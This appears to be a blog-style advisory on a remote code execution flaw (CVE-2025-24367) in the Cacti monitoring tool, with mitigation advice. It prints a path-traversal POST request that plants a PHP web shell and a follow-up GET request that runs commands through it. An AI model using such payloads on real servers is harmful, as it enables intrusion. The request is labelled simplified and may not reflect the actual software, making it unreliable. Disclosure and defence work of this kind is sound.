Cacti (http://www.cacti.net/) is an open-source performance monitoring and fault management framework for managing network devices and reporting on their status. Cacti is popular among system administrators due to its ease of use, scalability, and extensibility. However, a recent vulnerability (CVE-2025-24367) has been discovered that allows an authenticated Cacti user to create arbitrary PHP scripts in the web root of the application, leading to remote code execution on the server. In this post, we will explore this vulnerability, provide code snippets to demonstrate its exploitation, and discuss mitigation steps. This vulnerability has been fixed in Cacti version 1.2.29.
Exploit Details
This vulnerability lies within the graph creation and graph template functionality of Cacti's web-based user interface. An authenticated user can create graphs and customize them using graph templates, but due to insufficient input validation and sanitization, it is possible for an attacker to inject arbitrary PHP code into a graph template, which then gets saved as a PHP file in the web root of the application. Once the malicious PHP file is saved in the web root, it can be accessed and executed remotely.
Here is a simplified code snippet demonstrating the exploit
POST /cacti/graph_templates.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
...
action=save&id=&input_title=[GraphTitle] &input_file=../../../../webroot_dir/[filename].php &input_content=<?php+system($_GET['cmd']);+?>
In this HTTP POST request, we create a new graph template with the title [GraphTitle], the file named [filename].php, and the content containing a simple PHP script that executes a system command passed through the cmd GET parameter. When the server processes this request, it will create a PHP file with the specified filename and content in the web root directory, allowing the attacker to execute arbitrary commands on the server remotely.
For example, to execute the whoami command on the server, the attacker can send a GET request as follows:
GET /cacti/webroot_dir/[filename].php?cmd=whoami HTTP/1.1
Host: example.com
Upon executing this request, the server will respond with the output of the whoami command, revealing which user account is running on the server.
Reference to Original Discovery
The original discovery of this vulnerability can be found on the following GitHub issue: https://github.com/Cacti/cacti/issues/3702. Kudos to the researcher who discovered and responsibly reported this vulnerability, helping the Cacti project to improve its security.
Mitigation Steps
To protect against this vulnerability, Cacti has issued a fix in version 1.2.29. Users are encouraged to upgrade to this version or later to protect against this vulnerability. Moreover, administrators should implement proper user management, ensuring that only trusted users have access to Cacti's web-based user interface.
Running Cacti with the minimal required privileges.
2. Ensuring that the Cacti web access is restricted to trusted networks and/or using strong authentication mechanisms.
3. Regularly updating the Cacti software and its dependencies to ensure patches for known vulnerabilities are applied.
Conclusion
CVE-2025-24367 is a serious vulnerability in the Cacti network performance monitoring framework that allows an authenticated user to create arbitrary PHP scripts in the web root of the application, leading to remote code execution on the server. Users should upgrade to Cacti version 1.2.29 or later to mitigate this vulnerability and follow security best practices for deploying Cacti in their environments.
Timeline
Published on: 01/27/2025 18:15:42 UTC
Last modified on: 01/27/2025 19:15:29 UTC